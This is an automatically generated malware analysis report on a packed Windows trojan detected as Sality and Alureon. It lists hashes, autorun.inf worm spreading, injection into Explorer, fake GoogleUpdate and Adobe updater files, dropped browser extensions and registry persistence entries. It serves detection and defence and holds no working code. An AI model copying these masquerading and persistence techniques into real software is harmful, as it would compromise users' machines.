not-a-virus:AdWare.NSIS.Adwapper.ai (Kaspersky), Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Trojan.Win32.Alureon.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Worm, Virus, Adware, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: b3ed4f793938d67d57f622a85e8e6436
SHA1: 6e0edf2b4af7ac6ee67e5c2922ebe37fd73271bd
SHA256: 45afbd849ce9dec3da5c2f01bac6229a77499a73dc3d88163145a66d496555bc
SSDeep: 196608:Y4UwDTJD5NsF1E7C0NV952G4TPqql5sSBkpAIIwQbruiUM6E7n6h:Y7wDTB5uFEBNVP2G4TbPsSBIK3GMc
Size: 9946112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Trojan creates the following process(es):
GoogleUpdate.exe:2616
GoogleUpdate.exe:2788
GoogleUpdate.exe:2396
GoogleUpdate.exe:3060
GoogleUpdate.exe:2140
GoogleUpdate.exe:3724
GoogleUpdate.exe:2504
a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe:2092
%original file name%.exe:312
a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe:3964
Sense-codedownloader.exe:3400
Sense-codedownloader.exe:3032
a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe:2568
Tkbjndnqomlxl.exe:2840
regsvr32.exe:2328
The Trojan injects its code into the following process(es):
Explorer.EXE:1140
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process GoogleUpdate.exe:2788 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\globalUpdate\Update\Install (0 bytes)
The process GoogleUpdate.exe:3724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MSIa82cb.LOG (474 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (940 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (936 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)
The process %original file name%.exe:312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\WrapperUtils.dll (1856 bytes)
C:\autorun.inf (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0007F3B4_Rar\%original file name%.exe (75544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\Tkbjndnqomlxl.exe (4202874 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winkumnvb.exe (561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (332415 bytes)
%System%\drivers\ktonn.sys (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wduc.exe (561 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (272 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\orxds.exe (15019 bytes)
C:\totalcmd\TOTALCMD.EXE (1728 bytes)
C:\ljssj.pif (99 bytes)
%Program Files%\Common Files\Adobe\ARM\1.0\AdobeARM.exe (12 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\Reader_sl.exe (840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\Smpcpq.tmp (308806 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\wduc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winkumnvb.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp (0 bytes)
%System%\drivers\ktonn.sys (0 bytes)
%WinDir%\7f172 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0007F3B4_Rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\orxds.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
The process Tkbjndnqomlxl.exe:2840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Sense\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\InstallerUtils2.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\45.js (1 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\123.js (1 bytes)
%Program Files%\Sense\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943.xpi (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\269.js (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\91.js (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\UserInfo.dll (4 bytes)
%Program Files%\Sense\Sense-codedownloader.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\7809 (1064979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\263.js (1 bytes)
%Program Files%\Sense\Sense-bg.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateHelper.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\239.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins.json (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\InstallerUtils.dll (27704 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\1.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\244.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%WinDir%\Tasks\temp_a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (138 bytes)
%WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-1.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\125401 (279876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\38.js (2 bytes)
%Program Files%\Sense\042abe8f-d024-483d-b16f-b35d66d1d726.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\221.js (415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\102.js (1 bytes)
%WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-11.job (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\userCode\background.js (429 bytes)
%Program Files%\Sense\utils.exe (71614 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\220.js (784 bytes)
%WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\userCode\extension.js (613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\246.js (7 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\180.js (1 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\226.js (510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\7.js (685 bytes)
%Program Files%\Sense\Sense-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp (465960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\262.js (1 bytes)
The Trojan deletes the following file(s):
%WinDir%\Tasks\temp_a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\7809 (0 bytes)
Registry activity
The process GoogleUpdate.exe:2616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E A2 E2 33 46 8A 98 29 30 6A 96 B6 21 4D 99 DE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"
The process GoogleUpdate.exe:2788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 A9 5E 3B 82 B5 55 2D AE 50 E8 D7 71 1B C5 5B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{7377509D-1EA7-45AD-9827-4971A2B4A820}]
"pv" = "1.3.25.0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
The process GoogleUpdate.exe:2396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F B0 6B 89 26 41 E7 4E A4 C0 AE BC B5 B5 6E 4C"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:3060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 F4 08 EF ED 98 77 7F B8 B9 4A BC 21 15 66 F3"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:2140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"
[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"
[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"
[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F D4 89 22 61 1E 5E 1F 67 FA 4C 9B C0 77 8F 51"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"
[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
The Trojan deletes the following registry key(s):
[HKCR\AppID\GoogleUpdate.exe]
The process GoogleUpdate.exe:3724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"
[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
